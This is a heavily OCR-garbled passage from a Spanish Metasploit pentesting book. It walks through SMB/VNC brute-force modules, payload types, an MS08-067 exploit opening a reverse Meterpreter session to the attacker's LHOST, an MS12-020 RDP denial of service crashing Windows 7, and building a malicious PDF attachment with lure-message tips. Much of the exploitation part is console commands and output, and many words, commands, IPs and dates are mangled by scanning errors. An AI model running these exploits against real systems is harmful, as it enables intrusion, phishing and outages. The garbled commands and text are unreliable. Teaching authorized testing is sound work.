pmeba  de  fuerza  bruta  sobre  ei  protocolo  SMB.  Se  le  puede  espeeificar  un  frehero  con  usuarios 
y  contrasenas,  conflgurarle  para  que  se  comprueben  los  passwords  en  bianco,  nombres  de  usuario 
iitilizados  corno  contrasenas,  etcetera.  Ademas,  si  Metasploit  se  encuentra  conectado  a  una  base 
de  datos  este  modulo  registrara  en  esta  Jos  login  satisfactorios  y  sobre  que  maquinas  ocurrieron. 
i  irectamente,  tambien  se  puede  probar  con  usuario  y  contrasena,  y  por  contrasena  tarnbien  se 
entiende  un  hash  LM  y  NT. 

Otra  lierramienta  para  obtener  informacion  sobre  el  servicio  SMB  es  auxiliary/scanmr/smh/smb 
cnumshares,  la  cualpermite  determinar  que  recursos  compartidos  son  proporeionados  por  SMB  en 
una  o  en  un  conjunto  de  maquinas  remotas.  La  hermmienta  amiliary/scanner/smb/smb_eninmt isers 
deici  mina  que  usuarios  locales  existen  en  la  maquina  remota. 

Para  el  servicio  VNC  se  dispone  de  las  herramientas  auxiliary /scanmr/vnc/wcjogin  y  auxiliary/ 
scanmr/vnc/vnc_none_auth.  La  primera  realiza  un  ataque  de  fuerza  bruta  sobre  un  servicio  VNC, 
como  en  las  antenores  herramientas  se  le  puede  pasar  un  fichero  con  usuarios,  contrasenas,  pmeba 
de  contrasenas  en  bianco,  etcetera.  La  segunda  herramienta  permite  saber  si  un  servidor  VNC 
permite  la  aulenticacion  sin  contrasena.  Puede  parecer  extrano  encontrarse  con  algo  as!  pero  una 
mala  configuracion,  un  servidor  olvidado  en  el  entomo,  un  folio  por  parte  de  un  administrador  puede 
Ilevar  a  esta  situacion. 

Emsten  gran  cantidad  de  herramientas  para  muchos  servicios,  simplemente  se  debe  buscar  en  la  rata 
mmhary/samner.  Herramientas  para  HTTP,  MySQL,  nelbios,  NFS,  Oracle,  Poslgres,  SAP,  SIP, 
SNMP,  etcetera.  Como  se  puede  ver  Metasploit  proporciona  gran  cantidad  de  pequeiias  utilidades 
para  reahzaruna  exploracion  y  analisis  de  servicios  sin  desplegar  ruido  sobre  el  entomo. 


El  presente  caplltifo  explica  la  rase  de  explotacion  de  vulnerabilidades  mediante  el  uso  de  Metasploit 
En  esta  fase  el  auditor,  tras  atializar  la  informacion  obtenida  y  las  posibles  vulnerabilidades 
cncoutradas,  lanzara  uno  o  varies  exploits  con  el  objetivo  de  Iograr  acceso  a  un  sistema  informaticoi 
remote  o  informacion  a  la  que  no  tiene  un  acceso  autorizado.  j 

Esta  fase  necesita  que  el  auditor  disponga  del  framework  actiializado  con  exploits  recientes,  los | 
cuales  pueden  ser  obtenidos  a  traves  de  Internet.  Cuanto  mayor  ntimero  de  exploits  recientes  se  tenga 
mas  posibilidades  existen  de  disponer  de  la  Have  que  proporcione  el  exito  en  el  test  de  intrusidn.  ^ 

Ademas,  se  debe  ester  informado  sobre  las  vulnerabilidades  que  aparecen  diariamente  sobre  los* 
sistemas,  ya  que  esto  puede  ayiidar  a  encontrar  pequenos  aguj.eros  ,en  los  mismos,  aunque  se% 
encuentren  actualizados  casi  diariamente. 

La  eleceion  del  payload  es  algo  fundamental  y  critico  a  la  hora  de  realizar  la  explotacion  de  un|j 
sistema.  EI  auditor  debe  elegir  el  contexto  en  el  que  se  movera,  es  deeir,  si  utilizara  un  payload  para 
la  fase  de  post-explotacion,  o  por  el  eontrario,  le  hasta  con  conseguir  una  shell  sobre  un  sistema  ^ 
concreto  y  demostrar  la  vulnerabilidad  del  sistema.  Existe  gran  variedad  de  funcion alidades  base  L 
para  los pcn/loads ,  las  cuales  podran  estudiarse  en  el  presente  capitulo, 

Por  otro  lado,  hay  que  comentar  que  la  explotacion  de  un  sistema  puede  it  acompafiado  de  lay 
interaccioii  de  un  usuario  con  el  atacante,  por  ejemplo  a  traves  de  una  conexion  a  un  servidor  web, 
o  la  no  interaccion  de  la  victima  con  el  atacante.  Por  ejemplo  un  usuario  no  dispone  de  un  servicio  ' 
actiializado  o  correctamente  conllgurado.  Es  bastante  logico,  y  as!  se  entiende  que  un  ataque  sin 
interaccion  de  la  victima  provoca  mayor  temor  por  parte  de  los  usuarios,  pero  hoy  en  dia  es  igual  de 
factible  y  temibie  un  ataque  eon  interaccion,  ya  que  un  usuario  normal  utiliza  links  para  acceder  a 
much  a  informacion  en  su  dia  a  dia,  y  son  aquelios  links  los  que  pueden  llevarle  a  cualquier  lugar  de 
Internet  inesperado,  por  ejemplo  un  servidor  web  que  lance  exploits  sobre  el  eqitipo  de  la  victima. 

Por  ultimo  destacar,  que  en  miichas  ocasiones  ia  explotacion  de  vulnerabilidades  puede  llegar  a  ser 
frustrante,  ya  que  puede  parecer  que  no  se  encuentra  la  via  de  acceso  para  realizar  la  explotacion, 
o  que  incluso  no  existe  un  exploit  que  aproveche  esa  via.  Se  recomienda  a  los  lectores  que  tengan 
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paciencia,  realicen  tin  estudio  y  analisis  de  ios  sistemas  exhaustive  y  que  en  niuchas  ocasiones  el 
caraino  mas  corto  hacia  el  objetivo  no  es  el  rnejor,  y  estudiando  un  camino  alternative  se  puede 
lograr  mayor  exito  en  el  test  de  intrusion. 

Como  ejemplo  pi  actico  se  indica  el  siguiente:  se  debe  probar  la  seguridad  de  un  equipo  con  Windows 
7,  y  se  dispone  de  conectividad  directa  desde  el  equipo  del  auditor,  pero  por  mucho  que  se  lanzan 
exploits  no  se  logra  vulnerar  el  equipo.  Tras  analizar  el  segmento  en  el  que  se  iocaliza  el  equipo 
objetivo,  se  encuentran  equipos  con  sistemas  operatives  Windows  XP,  ios  cuales  se  detecta  que  son 
vulnerabies. 

Tras  aprovechar  estas  vulnerabilidades  son  conlrolados  remotamente,  y  sepuede  obtener  information 
val  iosa  de  eilos,  como  por  ejemplo,  un  listado  de  usuarios  y  hashes,  i,y  si  esos  usuarios  se  encuentran 
en  el  equipo  con  Windows  7?  Ya  se  dispondrla  de  acceso  al  equipo  objetivo.  Mo  se  ha  utilizado  el 
camino  mas  corto,  pero  por  un  camino  altemativo  se  ha  obtenido  el  exito  en  la  prueba  de  intrusion. 


2.  Payloads 

Los  payloads  son  uno  de  Ios  protagonistas  de  este  libro  y  de  los  test  de  intrusion.  Elios  aportan  el 
exito  o  el  fracaso  en  muchas  de  las  pruebas  que  se  pueden  realizar  en  el  proceso.  Son  la  esencia  del 
ataque,  la  semilia  que  se  ejecuta  en  el  interior  de  la  maquina  remota  y  proporcionara  al  atacante  o 
auditor  el  poder  de  controlar  el  sistema  remoto. 

Existen  distintos  tipos  de  payloads  como  son  los  singles,  stagers  y  staged.  Estos  diferentes  tipos 
permiten  gran  versatilkfad  y  pueden  see  de  gran  utilidad  en  numerosos  escenarios  posibles. 

Los  paylaod  de  tipo  single,  tambien  conocidos  como  inline,  son  autonomos  y  realizan  una  tarea 
concreta  o  especllica.  Por  ejemplo,  bind  a  una  shell,  creation  de  un  usuario  en  el  sistema,  ejecucion 
de  un  comando,  etcetera. 

Los  payload  de  tipo  stagers  se  encargan  de  crear  la  conexion  entre  el  ciiente  y  la  victima,  y 
generalmente,  son  utilizados  para  desenrgar  payloads  de  tipo  staged. 

Los  payload  de  tipo  staged  se  descargan  y  son  ejecutados  por  los  de  tipo  stagers  y  normalmente 
son  utilizados  para  realizar  tareas  complejas  o  con  gran  variedad  de  funcionalidades,  como  puede 
ser,  un  meterpreter.  En  otras  palabras  los  de  tipo  staged  utiiizan  pequenos  stagers  para  ajustarse 
en  pequenos  espacios  de  memoria  donde  realizar  la  explotacion.  La  cantidad  de  memoria  que  se 
dispone  para  realizar  la  explotacion,  en  la  mayorla  de  los  casos,  esta  limitada.  Los  stagers  se  colocan 
en  este  espacio  y  realizan  la  ftmeion  necesaria  para  realizar  la  conexion  con  el  resto  del  payload,  de 
tipo  staged. 

lodos  los  exploits  en  Melasploit  utiiizan  exploit/multi/handler.  Este  modulo  es  capaz  de  gestionar 
y  manejar  cada  uno  de  los  exploits  que  se  encuentran  eii  el  framework,  sin  importar  la  conexion  o 
ei  tipo  de  arquitectura.  Este  modulo  esta  disenado  de  tal  forma  que  sabe  como  tratar  cada  tipo  de 
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payload  porque  en  su  configuracidn  se  le  dice  que  debe  esperar.  Cuando  el  auditor  se  encuentra 
con  un  modulo  cargado,  previo  uso  del  comando  use,  llega  un  momento  en  el  que  se  debe  elegir  el 
payload,  con  la  instrnccion  set  PAYLOAD  <ruta  payload> ,  y  es  en  este  punto  cuando  implicitamente 
se  llama  a  exploit/multi/handler  de  manera  transparente  al  auditor.  En  otras  ocasiones,  puede  ser  que 
se  deba  utilizar  explicitamente  a  exploit/multi/handler  para  manejar  y  gestionar  las  posibles  sesiones 
remotas. 

Para  visuaiizar  todos  los  payloads  disponibles  en  el  framework  se  dispone  del  comando  show 
payloads  ejecutado  desde  la  raiz  de  msfconsole.  Si  se  ejecuta  este  comando  una  vez  se  encuentra 
cargado  un  modulo  conci  eto,  s61o  se  mostraran  los  payloads  validos  para  dieho  mod  ulo,  siemprey 
cuando  el  desarrollador  del  modulo  as!  lo  haya  especificado. 

La  ruta  donde  se  encuentran  fisicamente  estos  payloads,  (hay  que  tener  en  ctienla  que  en  el  libro 
se  utiliza  BackTrack),  es  /pentest/exploits/fmmeworki/modules/payloads  donde  se  organizan  los  3 
tipos  por  carpetas  con  los  nombres  de  estos. 

Otra  de  las  cosas  que  hay  que  tener  en  cuenta  cuando  se  l  islan  los  distintos  payloads  es  la  propiedad 
NoNX y  NX.  El  NX  bit  es  una  caracterlstica  de  los  procesadores  modernos  para  prevenir  la  ejecucion 
de  codigo  en  ciertas  areas  de  memoria.  Por  ejemplo,  en  sistemas  Windows  NX  es  implemenlado 
como  DEP.  Si  se  ve  esta  caracterlstica  en  algun  payload  del  listado  significa  que  ese  codigo  esta 
preparado  para  evadir  el  DEP. 

Los  payloads  que  indican  IPv6  en  la  tista  indican  que  estan  preparados  para  funcionar  en  redes  IPv6. 


v/inaows/messayeDox 
windows/raeterpreter/bind_ipv6_tcp 
(Reflective  Injection],  Bind  TCP  Stager  (IPv6) 
windows/mete  rp  reter/bindnonxt  cp 
(Reflective  Injection),  Bind  TCP  Stager  (No  NX  or  Win?) 

windows/meterpreter/bind_tcp 
(Reflective  Injection),  Bind  TCP  Stager 
windows/meterpreter/findtag 
(Reflective  Injection),  Find  Tag  Ordinal  Stager 
windows/meterpreter/ reverse  http _ 


normal  Windows  Meterpreter 
normal  Windows  Meterpreter 
normal  Windows  Meterpreter 
normal  windows  Meterpreter 
normal  Windows  Meterpreter 


Fig  3.01 :  Ejecucion  de  show  payloads. 


La  eleccion  del  payload  es  fundamental,  y  puede  llevar  a  la  prueba  al  exito  o  al  fracaso.  Bn 
condiciones  normales,  para  poder  realizar  la  prueba  de  explotacion  vaklrla  con  un  exploit  de  lipo 
single,  el  cual  deje  una  evidencia  de  que  se  ha  ejecutado  codigo  arbitrario  en  el  sistema. 

Tambien  hay  que  tener  claro  que,  generalmente,  los  test  de  intrusion  no  es  solo  ejecutar  codigo 
arbitrario  en  una  maquina  remota,  ya  que  se  pueden  utilizar  estas  maquinas  vulneradas  para  acceder 
a  recursos  mas  interesantes  en  una  organizacion  y  conseguir  mejores  resultados.  Es  por  esta  razon 
que  los  tipos  stagers  son  tambien  muy  interesantes  y  utiles  en  algunos  escenarios. 
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3.  Intrusion  sin  interaccion 

Ei  lanzamiento  de  exploits  sobre  maquinas  objetivo  sin  interaccion  por  parte  del  usuario  es  tmo  de  Ios 
puntos  que  mas  puede  asustar  a  !os  usuarios  y  propietarios  de  maquinas  o  empresas.  Esta  situacion 
es  ci  itica  ya  que  si  una  maquina  es  vulnerable  a  tin  exploit  el  cual  no  requiera  de  interaccion  per  pane 
del  usuario,  etialquier  atacante  podria  tomar  el  control  rernoto  dc  dicho  equipo  sin  que  e!  usuario 
notase,  a  priori,  nada  extraiio. 

A  conlinuacion  se  van  a  proponer  algunos  ejemplos  median te  ei  uso  de  pruebas  de  concept©  en  ef 
que  se  podia  estudiar  la  configuracion  y  ejecucion  de  este  tipo  de  exploits  y  situaciones. 

PgC:  La  primera  intrusion 

Hn  esta  prueba  de  concepto  se  hara  uso  de  la  vulnerabilidad  MS08-067,  de  la  que  se  puede  obtener 
mas  mformacion  y  detalies  en  el  siguiente  sitio  web  hitp:l/www. Microsoft. com/takim/tec/mel/ 
seguridad/boletines/2008/ms08-06 7,  mspx. 

En  primer  lugar,  tras  arrancar  msf console,  se  puede  reaiizar  una  biisqueda  por  servicio,  tecnologia, 
aphcacion,  mechanic  e!  comando  search,  por  ejemplo  search  netapi.  Se  obtiene  a  si  una  lista  con  Ios 
modulus  que  encajan  con  ei  patron  de  biisqueda  introducido  anleriormente. 

^nsf  >  search  netapi”  - — . - . — - - 

1*1  Searching  loaded  modules  for  pattern  ‘netapi’... 


Disclosure  Date  Rank  Description 


windows/smb/ms03_O49_ netapi  2003-11-11 
rna  fceCowputerName  Overflow 

windows/smb/mse6_O40  netapi  2606 -08 -eg 
calize  Overflow 

windows/smb/ms06_e78_wkss  vc  2006 - 11 - 14 
tPCConnect  Overflow- 

windows/smb/ms08_067_netapl  2008-10-28 
{tack  Corruption 


good  Microsoft  Workstation  Service  NetAddAUe 
great  Microsoft  Server  Service  NetpwPathCanuni 
manual  Microsoft  Workstation  Service  NetpManage 
great  Microsoft  Server  Service  Relative  Path  s 


Fig  3.02:  Biisqueda  de  moduios  eon  el  comando  scorch. 

En  este  punto  ya  se  dispone  de  la  rota  donde  se  aloja  ei  modulo  que  se  requiere,  en  este  ejemplo  seria 
exp/oit/windows/smb/ms08J)6 7  netapi .  Para  cargar  ei  modulo  se  utiliza  el  comando  use,  y  una  vez 
cargado  se  piieclen  configurar  sus  variables  para  lanzar  e!  exploit  sobre  el  objetivo.  Ei  cuai  en  esta 
prueba  de  concepto  es  una  maquina  Windows  XP  SP3  Spanish.  Este  exploit  se  puede  utiiizar  sobre 
una  gran  cantidad  de  objetivos.  cubriendo  Windows  2000,  2003  y  XP  con  SP2  y  SP3. 

May  que  recordar  que  Ios  comandos  info  o  help  ayuclan  a  obtener  informacion  sobre  el  modulo 
o  sobre  Ios  comandos  que  se  pueden  utiiizar.  Ademas,  e!  comando  show  aporta  informacion,  por 
ejemplo,  sobre  las  opciones  con  las  que  se  puede  configurar  el  exploit  y  las  opciones  que  dispone 
e]  payload,  o  los  payloads  disponibles  para  este  modulo  con  show  payloads,  o  inciuso  Ios  target 
compatibles  con  el  modulo  con  show  targets. 
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msf  >  use  exptoit/windows/siab/ms03  057_netapi - 

Bif  exploit  (ms08_867 jietapi)  >  show  options 

Module  options  ( exploit /wirdows/smb/msBS  867_netapi): 

Name  Current  Setting  Required  Description 

RHOST  yes  Thp  tarnot 


Current  Setting 

Required 

Description 

yes 

The  target  Bddress 

445 

yes 

Set  the  SMB  service  port 

BROWSER 

yes. 

The  pipe  name  to  use  (BROWSER,  SRVSVC) 

exploit  target: 

Id  Name 

C  Automatic  Targeting 

§sj  exploit (sisOB_087_net3pi)  >  set  payload  windows/meterpreter/ reverse  ten 

PAYLOAD  =>  windows/meterpreter/reverse  tep  ~  , 

9Si  exploit (rasQS  067  netapi)  >  set  RHOST  192.168  1  37 

RHOST  =>  192.168.1.37  _ _ _ J _ _ : 

Fig  3.03:  Carga  del  exploit  y  configuracion  del  modulo. 

Una  vez  cargado  ei  modulo,  si  se  ejecuta  show  options  se  muestran  las  variables  para  configurar  el 
exploit.  En  este  ejemplo,  se  configura  ia  variable  RHOST  para  indicar  dial  es  la  maquina  objetivo  ’ 
Ademas,  se  debe  indicar  en  la  variable  PAYLOAD  cual  de  elios  se  quiere  ejecutar.  Una  vez  indicado  , 
el  payload  si  se  vuelve  a  ejecutar  el  comando  show  options  se  puede  observer  como  aparecen, 
ademas  de  las  variables  de  configuracion  del  exploit,  las  variables  de  configuracion  del  payload. 

art  cxploi  t(ms08_Q67jiets|>i)  >  show  options  -  1  — * - 

Nodule  options  (axploit/wlmiows/smb/ms08  067_netapi): 

Hame  Current  Setting  Required  Description 


RHOST  192.168.1.37 
RPORT  445 
SMBPIPE  BROWSER 


The  target  Bddress 

Set  the  SMB  service  port 

The  pipe  name  to  use  (BROWSER,  SRVSVC) 


Payload  options  (windows/meterpreter/reverse  tep): 
Name  Current  Setting  Required  Description 


EXITFUNC  thread 
IKOSr 

LPORT  4444 


Exit  technique:  seh,  thread,  process,  none 
The  listen  address 
The  listen  port 


('Exploit  target: 

Id  f/ame 

I  . 

|  0  Automatic  Targeting 


tef  ext)loit(msOB_067  netapi)  >  set  LHOST  152.168.1.3 
(LHCST  ■=>  192. 160. 1.35 


Fig  3.04:  Carga  del  payload  y  configtiraci6n  del  m6duJo. 

Es  muy  interesante  entender  distintos  concepts  en  el  comportamiento  de  los  payload  en  funcidn 
de  si  son  inverses,  mvme,  o  directos,  bind.  En  la  prueba  de  concepto  se  ha  utilizado  un  payload 
meterpreter  de  conexion  mversa,  por  lo  que  se  debe  configurar  al  codigo  del  payload  donde  se  debe 
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conectar  median te  ia  variable  LHOST,  es  decir,  a  la  direccion  IP  del  atacante  o  de  un  servidor  que 
recoja  las  conexiones  que  se  encuentre  bajo  el  control  del  atacante. 

Por  otro  lado,  se  podria  haber  utiiizado  un  payload  con  conexion  directa,  bind.  En  ese  caso,  en  vez 
de  aparecer  la  variable  LHOST  en  la  configuracion  del  payload ,  aparecerla  la  variable  RHOST, 
que  debe  ser  la  direccion  IP  de  la  maquina  a  la  que  se  quiere  acceder.  Hay  que  recordar  que  en  un 
payload  de  conexion  directa,  es  el  auditor  quien  se  conecta  a  la  vlctima.  Tras  el  lanzamienlo  del 
exploit ,  se  deja  en  un  puerto  a  ia  escucha,  por  ejemplo,  una  shell ,  y  es  entonces  el  auditor  quien  se 
conecta  a  ese  puerto  donde  espera  ia  shell  rernota. 


1.  ArnlHor  Ikdu  exploit 

2.  Ejeci:d6a  tie  coiligo  en  uiiqiiloa  ronioli 

3.  El  payload  se  conecta  a  la  direccioa  quo  se  cimfigui-o  ea 

la  variable  LUOST  _ . 


’ZB  '  4. La  variable  LHOST  puede  ser  Is  direccion  I  P  del  auditor 

u  otro  servidor  muiejada  por  cl  auditor  que  recoje  couexiones 


1.  Auditor  bora  exploit  \ 

2.  Ejecucieo  de  codigo  en  maquina  remuta 

3.  Sc  de]a  en  un  puerto  una  shell 

4.  La  variable  RHOST  del  payload  debe  ser  la  direccion 
IP  de  la  vlctima.  Auditor  conecla  con  esa  IP  y  pu erl u 

Fig  3.05:  Detalle  (le  ia  conexion  de  los  payload. 


El  comando  check  permite  verificar  si  el  equipo  remoto  es  vulnerable  al  modulo  cargado,  por  eslo, 
antes  de  lanzar  el  exploit  se  puede  utilizar  este  comando  para  verificar  ia  vulnerabilidad.  Una  vez 
verificada  se  lanza  el  comando  exploit,  y  se  obtiene  la  sesion  rernota,  en  este  caso  de  melerpreter. 


last  exploittasOfl  067_tietapi)  >  check  “ 

1*1  Verifying  vulnerable  status...  (path:  8x8006805a) 

! 1 1  The  target  Is  vulnerable. 

msf  exploit (0sOB_aB7_netapi)  >  exploit 

[*}  Started  reverse  handler  on  192 . 168 .1.35 : 4444 
H  Automatically  detecting  the  target... 
l»J  Fingerprint:  Windows  XP  -  Service  Pack  3  -  lang:Spanish 
M  Selected  Target:  Windows  XP  SP3  Spanish  (NX) 

(*)  Attempting  to  trigger  the  vulnerability... 

1*1  Sending  stage  (749056  bytes)  to  192.168.1.37 

i*l  Melerpreter  session  2  opened  (192.168.1.35:4444  ->  192.168.1.37:1843)  at  2812-66-24  17:48:65 
t9260  _ _ _ _ 

Fig  3.06:  Explotaciou  de  la  maquina  Windows  XP  SP3  Spanish. 


PoC:  Denegacion  de  servicio  y  las  perdidas 

En  esta  prueba  de  concepto  no  se  realiza  un  proceso  de  intrusion,  pero  si  se  comprueba  la  seguridad 
de  ios  servicios  de  los  que  puede  disponer  una  empresa,  cuyas  caldas  pueden  provocar  perdidas  a 
estas,  ya  sea  de  forma  privada  o  pubiica.  En  este  ejemplo  se  utiiizara  la  vulnerabilidad  MS 1 2-020  de 
la  que  se  puede  obtener  mayor  information  en  la  siguiente  URL:  hltp://technet.microsojlconi/es-es/ 
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security /bulletin! ms 12-020.  La  maquina  objetivo  en  el  siguiente  escenario  sera  un  Windows  7  con 
SP1  de  64  bits.  Tambien  son  posibles  targets  las  siguientes  versiones  de  los  sistemas  operativos  XP, 
2003, 2008  6  2008  R2. 

En  primer  lugar,  la  vlctima  debe  disponer  de  una  configuracion  concreta  de  su  servicio  de  escrjlorio 
remoto.  Como  se  puede  visualizar  en  la  imagen  existen  3  opciones  en  Windows  7,  logicamente,  si  no 
se  permiten  conexiones  no  se  podra  realizar  la  denegacion  de  servicio,  y  por  otro  iado,  si  se  configura 
que  solo  se  permitan  las  conexiones  desde  equipos  que  ejecuten  eseritorio  remoto  coil  autenticacion 
a  nivel  de  red  tampoco.  Por  lo  que  si  la  vlctima  dispone  de  la  configuracion  permitir  conexiones 
que  ejecuten  ctialquier  version  de  eseritorio  remoto,  puede  ser  vulnerable  si  no  ha  actualizado  con 
la  correction  de  la  vulnerabilidad. 


Para  obtener  el  modulo  se  puede  descargar  directamente  en  la  siguiente  web  www. metasploit. 
coni/modules/auxiliary/dos/wmdows/rdp/msl2J)20jnaxchannelids  leniendo  en  cuenta  que  es  un 
modulo  de  tipo  auxiliary. 
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Una  vez  se  dispone  del  modulo  en  el  framework  se  accede  a  el  y  se  configure,  de  manera  senciila, 
e!  equipo  remoto  a!  que  se  quiere  denegar  el  servicio.  Si  todo  va  bien.  se  obtendra  un  mensaje  que 
emmeia  seems  down .  Si  la  maquina  a  auditar  dispusiera  de  un  servicio  de  escritorio  remoto  en  otro 
Puerto  que  no  sea  el  de  por  clefecto,  se  puede  utilizar  la  variable  RPORT  para  indicar  cual  es  el  puerto 
que  se  esta  utilizando. 

Parece  que  todo  ha  funcionado  correctamente  y  que  la  maquina  ha  caido.  En  funcion  de  la 
configuracion  de  la  maquina  esta  se  reiniciara  tras  realizar  un  voicado  de  memoria.  si  tras 
votverse  a  levantar  se  le  vuelve  a  realizar  una  denegacion  de  servicio?  si  la  maquina  no  esta 
configurada  para  reiniciarse  y  queda  liiera  de  servicio  hasta  su  reinicio  manual?  Estas  preguntas  son 
baslarile  logicas,  y  la  realidad  es  que  si  la  maquina  es  vulnerable  la  empresa  tiene  un  gran  problema, 
ei  cual  deberla  ser  solucionado  con  la  aplicacion  del  parche  para  evitar  este  agujero. 


A, problem  has  been. detected  and  windows  has  been  shut  down  to  prevent  damage' 
to  your  computer,.  /'  ■ 

RPFWD, SYS 

pAGE_FAULT_IMJ10NPAGED„flREA 

if  this  is  the  first  time  you've  seen  this  stop  error  screen, 
restart  your  computer,  if  this  screen  appears  again,  follow 
.these  steps: 

check  to  make  sure  any  new  hardware  or  software  is  properly  installed, 
if  this  1$  a  new  installation,  ask  your  hardware  or  software  manufacturer 
for  any  Windows  updates  you  might  need. 

If  problems  continue,  disable  or  remove  any  newly  installed  hardware 
or.  software,  Disable  bios  memory  options  such  as  caching  or  shadowing, 
if  you  need  to  use  safe  Mode  to  remove  or  disable  components,  restart 
your  computer,,  press  F8  to  select  Advanced  startup  options,  and  then 
select  safe  Mode, 

Technical  information:  :  ' 

stop;  0X00000050  (OXC5F58AGC, GxQQQGOQCO, Qx8FAFFAEE, 0x00000002) 

rdpwd,  sys  -  Address  Sfaffaee  base  at  8FAEQQ00,  Datestamp  4<i5bcaee 

collecting data  for  crash  dump  ...  ■  v 

initializing  disk  for  crash  dump  ...  •  - 

pegihriirig  dump  of  physical  memory. 

ptiiiipihg' physical  .memory  to’  disk:..  10  •  ,..‘>7  , 


Fig  3.09:  Pantallazo  azui  de  Windows  7  Iras  la  denegacion  de  servicio. 


4.  Intrusion  con  interaction 

Client  .side  attack  o  ataques  del  lado  del  cliente,  son  ataques  que  permiten  al  atacante  tomar  el 
control  de  una  maquina  vlctima  explotando  una  vulnerabilidad  de  una  aplicacion  que  es  cjecutada 
por  el  usuario.  Este  tipo  de  ataques  son  muv  frecuentes,  cada  vez  son  mas  complejos  y  provocan  que 
la  vlctima  no  sepa  realmente  lo  que  esta  haciendo  con  su  maquina. 

Esta  teenica  consiste  en  crear,  ya  sea  un  fichero,  un  servicio,  o  una  aplicacion,  con  fines  maliciosos 
con  el  objetivo  de  obtener  acceso  a  la  maquina  de  la  vlctima,  ya  sea  por  red  local  o  por  Internet. 
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Metasploit  ayuda  niucho  en  este  tipo  de  ataques  y  en  este  apartado  se  demostrara  la  flexibilidad  a  1a 
bora  de  pensar  en  un  ataque  de  este  tipo.  1 

i jjfl 

A  continuacion  se  proponen  distintos  escenarios  y  pruebas  de  concepto  con  los  que  el  lector  puede 
asimilar  la  tecnica  y  los  conceptos  de  manera  senciila  y  rapida.  ,  | 

I 


PoC:  Los  archivos  adjuntos  pueden  ser  muy  peligrosos  i 

En  esta  prueba  de  concepto  se  utilizara  la  posibilidad  de  crear  archivos  maliciosos  con  el  fin  de  qui 
las  vlctimas  lo  ejecuten  mediante  el  uso  de  una  aplicacion  vulnerable.  En  la  prueba  se  utiliza  uni 
vulnerabilidad  de  ia  famosa  herramienfa  Adobe  Reader,  la  cual  es  vulnerable  en  sus  versiones  8.x  f 
9.x  del  producto.  ^ 


En  este  ejemplo  se  ha  decidido  explotar  esta  vulnerabilidad  debido  a  que  afecta  a  los  archivos  PDpf 


muy  utilizados  en  Internet,  y  a  una  de  las  herramientas  que  disponen  la  mayorla  de  los  usuarios  para 
visualizar  este  tipo  de  archivos.  Existen  otras  vulnerabilidades  de  este  tipo,  comunmente  conocidas 
como  FileFormat,  en  el  que  se  pueden  crear  documentos  ofimaticos  de  aplicaciones  muy  utiiizadaJ 


como  Word  o  Excel,  o  archivos  de  listas  de  reproduction  de  iTunes,  cuyos  fines  son  maliciosos.  j 


Una  de  las  vlas  de  distribucion  de  este  ataque  serla,  por  ejemplo  en  el  contexto  de  una  gran  empresai 
el  correo  electronico.  Mediante  ia  utilization  de  un  servidor  de  correo  electronico  se  podria  hacer 
llegar  este  tipo  de  archivos  a  toda  una  organization  y  con  alta  probabilidad  habrfa  usuarios  que 
ejecutadan  estos  archivos.  Otra  de  las  vtas,  serla  coigar  estos  archivos  en  foros,  blogs,  sitios  web* 
bajo  el  control  del  atacante,  etcetera.  Como  siempre,  todo  depende  de  la  imagination  del  atacante  y 
de  la  calidad  de  su  ingen ierla  social.  I 


El  escenano  que  se  propone  en  esta  prueba  de  concepto  es  que  un  atacante  prepara  un  documento 
PDF  en  el  cual  se  inyecta  un  payload  de  tipo  Melerpreter.  Este  archive  utilizara  una  plantilla,  es* 
decir,  un  documento  PDF  real  que  sera  el  que  se  visualizara  cuando  la  vlctima  lo  ejecule.  Ademas,, 
cuando  la  vlctima  lo  ejecute,  si  su  aplicacion  Adobe  Reader  es  vulnerable  se  ejecularael;;qy/o^/.  El 
atacante  realizara  la  distribucion  mediante  el  uso  del  correo  electronico,  como  archive  adjunto.  EF 
atacante  debera  cargar  el  modulo  exploit/, milti/handler  para  recoger  las  distintas  conexiones  que  se< 
obtengan  por  las  explotaciones  realizadas  con  Cxito  mediante  el  archivo  PDF  malicioso 

Ei  exploit  se  encuentra  alojado  en  exploit/mndows/ftleformaifadobe jpdf_embedded_exe  en  la  rata 
reiativa  a  msfconsole.  Si  se  miran  los  targets,  se  encuentra  que  solo  funciona  para  Windows  XP 
'  SP3  version  ingiesa.  Si  el  objetivo  son  vlctimas  con  sistemas  operatives  en  otro  idioma,  el  ataque 
por  defecto  no  funcionara.  Existe  una  facil  solucion  y  es  modificar  el  script  en  Ruby  y  anadir  lo 
necesario  para  que  ei  exploit  fimeione  en  sistemas  operativos  con  la  version  espanola 

Ei  exploit  se  encuentra  en  fa  ruta  /■ 'pentest/exploits/frameworki/modu les/exploits/mndows/ 
jileformat/ adobe jpdf_em bedded _ex.e.  r b  6  / 'opt/opi/metasp Ioit3/msfi/modules/exploits  l windows / 
jileformat./ adobe _pdf_embedded_exe. rb .  Para  modificar  el  exploit  y  que  functone  en  Windows  XP 
SP3  en  espanol  se  debe  localizar  la  siguiente  Unea  en  el  codigo. 
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dirs  -  f  "Desktop",  "My  Documents",  "Documents"] 

Simpleinente  se  deben  atiadir  los  siguientes  nombres  a  la  anterior  linea. 

dirs  =  (  "Desktop",  "My  Documents",  "Documents",  "Escritorio",  "Mis  Documentos", 
"Documentos"  ] 


Una  vez  modificado  el  script  se  debe  arrancar  msfconsole  y  se  podra  ulilizar  el  nuevo  modulo 
modificado.  En  la  siguiente  tabla  se  pueden  visualizar  algunos  parameiros  inleresantes  a  configitrar 
Iras  la  carga  del  modulo  adobe _pdf_embedded  exe. 

Par  a  metro  yajor 

EXENAME _ N ombre  del  ejecutable  del  payload ,  si  no  se  indica  se  autogenera  uno. 

FILENAME _  Se  indica  el  nombre  que  recibira  el  PDF  malicioso. 

IN  FILENAME  *™^ca  la  ruta  ctoil<Ie  se  encuentra  el  PDF  real  que  se  utilizara  para 

_ _  _  mostrar  a  la  vlctima. 

LAUNCH  MESSAGE  Mensaje  clue  visualizara  la  vlctima,  el  cual  si  ejecuta  se  realizard  la 

_  ~  explotacion.  Debe  ser  un  mensaje  cretble, 

Tabla  3.01:  Configuration  del  modulo  adobe jpdfeinbedded  exe. 


INFILENAME  =s>  /root/Oesktop/aiPlantilla .  pdf 

lit  exploit  (iidobe_pdf  embedded  exe)  >  set  OUTPUTPATH  /root 

OUTPUTPATH  =>  /root 

exploit(adobe_pdf_embedded_exe)  >  show  options 

Module  options  (exploit/windows/filefon#at/adobe_pdf_e(nbedded_exe) : 

Name  Current  Setting 

Required  Description 


no  The  Name  of  payload  exe. 

FILENAME  evil.pdf 

no  The  output  filename. 

